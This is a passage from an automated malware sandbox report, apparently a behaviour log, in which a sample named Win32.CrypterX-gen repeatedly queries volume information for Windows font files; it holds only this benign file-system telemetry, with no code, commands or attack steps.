              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
